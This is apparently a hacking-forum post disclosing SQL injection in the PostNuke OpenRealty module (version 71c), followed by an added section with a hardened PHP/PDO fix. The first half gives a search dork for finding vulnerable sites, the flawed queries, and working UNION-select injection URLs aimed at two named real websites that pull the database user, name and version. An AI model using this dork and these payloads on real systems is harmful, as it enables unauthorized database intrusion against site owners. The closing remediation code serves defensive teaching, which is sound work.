Rank: Познавший АНТИЧАТ | Registered: 18.02.2008 | Posts: 1,136 | Reputation: 4915
PostNuke. Module: OpenRealty SQL
Vulnerable product: OpenRealty module
Version: 71c
Dork: "inurl:module=OpenRealty"
Condition: "none"
1. Code
PHP code:
$sql = "SELECT $realtyhomescolumn[or_agent],
        $realtyhomescolumn[or_mls],
        $realtyhomescolumn[or_title],
        $realtyhomescolumn[or_address],
        $realtyhomescolumn[or_city],
        $realtyhomescolumn[or_state],
        $realtyhomescolumn[or_zip],
        $realtyhomescolumn[or_neighborhood],
        $realtyhomescolumn[or_virtualtour],
        $realtyhomescolumn[or_yearbuilt],
        $realtyhomescolumn[or_sqfeet],
        $realtyhomescolumn[or_lotsize],
        $realtyhomescolumn[or_garagesize],
        $realtyhomescolumn[or_type],
        $realtyhomescolumn[or_beds],
        $realtyhomescolumn[or_baths],
        $realtyhomescolumn[or_numfloors],
        $realtyhomescolumn[or_price],
        $realtyhomescolumn[or_status],
        $realtyhomescolumn[or_featured],
        $realtyhomescolumn[or_dateposted],
        $realtyhomescolumn[or_previewdesc],
        $realtyhomescolumn[or_fulldesc],";
// 20 property-feature and 20 community-feature columns are appended in loops
for ($x = 1; $x <= 20; $x++) {
    $featurenum = "or_pfeat" . $x;
    $sql .= "$realtyhomescolumn[$featurenum],";
}
for ($x = 1; $x <= 20; $x++) {
    $featurenum = "or_cfeat" . $x;
    $sql .= "$realtyhomescolumn[$featurenum],";
}
// $or_hid is taken from the request and interpolated unquoted and unescaped
$sql .= " $realtyhomescolumn[or_notes]
          FROM $realtyhomes
          WHERE $realtyhomescolumn[or_hid]=$or_hid";
Those are some hefty queries.
Vulnerable parameter: or_hid
Example of the vulnerability:
http://www.alpujar.com/english/index.php?module=OpenRealty&func=display&or_hid=-274+union+select+1,2,concat_ws(0x3a,User(),Databas e(),Version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,64/*
2. Code
PHP code:
// $or_picid is likewise interpolated straight from the request, unquoted and unescaped
$sql = "SELECT $realtycolumn[or_pictype], $realtycolumn[or_picdata] FROM $realtytable WHERE $realtycolumn[or_picid] = $or_picid";
Vulnerable parameter: or_picid
Example of the vulnerability:
http://www.bulgarianpropertiesonline.com/modules/OpenRealty/image.php?or_picid=-1074+union+select+1,concat_ws(0x3a,User(),Database (),Version())/*
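Both queries in the post share one defect: a numeric id (`or_hid`, `or_picid`) is interpolated into the SQL string with no validation and no quoting, so a value beginning with `-274 union select ...` becomes part of the statement. The example below is added here and is not the OpenRealty module's own code: it reproduces the unsafe pattern beside a hardened version that validates the id as an integer and binds it through a PDO prepared statement. The table names (`or_homes`, `or_pics`), the reduced column sets, the SQLite in-memory database and the sample rows are all constructed for the demonstration.

```php
<?php
// Added example, not OpenRealty code: unsafe interpolation vs. prepared statements.
// Uses an in-memory SQLite database so it runs offline; schema and rows are constructed.

declare(strict_types=1);

function openDemoDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE or_homes (or_hid INTEGER PRIMARY KEY, or_title TEXT, or_city TEXT)');
    $db->exec('CREATE TABLE or_pics (or_picid INTEGER PRIMARY KEY, or_pictype TEXT, or_picdata BLOB)');
    $db->exec("INSERT INTO or_homes VALUES (274, 'Sample listing', 'Sample City')");
    $db->exec("INSERT INTO or_pics VALUES (1074, 'image/jpeg', X'FFD8FFE0')");
    return $db;
}

// The pattern from the post: the raw request value becomes part of the SQL text,
// so the caller controls the statement, not just the value being compared.
function displayHomeUnsafe(PDO $db, string $orHid): array {
    $sql = "SELECT or_title, or_city FROM or_homes WHERE or_hid=$orHid";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: reject anything that is not a plain positive integer, then bind the
// value as a typed parameter. The query structure is fixed before any data arrives.
function displayHomeSafe(PDO $db, string $orHid): array {
    if (!ctype_digit($orHid)) {
        throw new InvalidArgumentException('or_hid must be a positive integer');
    }
    $stmt = $db->prepare('SELECT or_title, or_city FROM or_homes WHERE or_hid = :hid');
    $stmt->bindValue(':hid', (int) $orHid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Same treatment for the image.php query (or_picid); returns null on bad input or no row.
function imageSafe(PDO $db, string $orPicId): ?array {
    if (!ctype_digit($orPicId)) {
        return null;
    }
    $stmt = $db->prepare('SELECT or_pictype, or_picdata FROM or_pics WHERE or_picid = :pid');
    $stmt->bindValue(':pid', (int) $orPicId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = openDemoDb();

// Constructed input of the same shape as the post's payload: a negative id that
// matches nothing, followed by a UNION that supplies attacker-chosen columns.
$injected = '-274 UNION SELECT sqlite_version(), 2';

print_r(displayHomeUnsafe($db, $injected));   // the UNION row comes back: injection succeeded

try {
    displayHomeSafe($db, $injected);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";    // validation stops it before the database is touched
}

print_r(displayHomeSafe($db, '274'));          // legitimate lookup still works
var_dump(imageSafe($db, '1074')['or_pictype'] ?? null);
var_dump(imageSafe($db, $injected));           // NULL
```

The `ctype_digit` check is what matters for ids: it rejects the leading minus sign, the spaces and the `union` keyword outright, so the payload never reaches the query. Binding with `PDO::PARAM_INT` is the second layer, and is the one that also covers string parameters where a format check alone is not enough. Applying the same two steps to `$or_hid` and `$or_picid` in the module's own queries closes both injection points shown in the post.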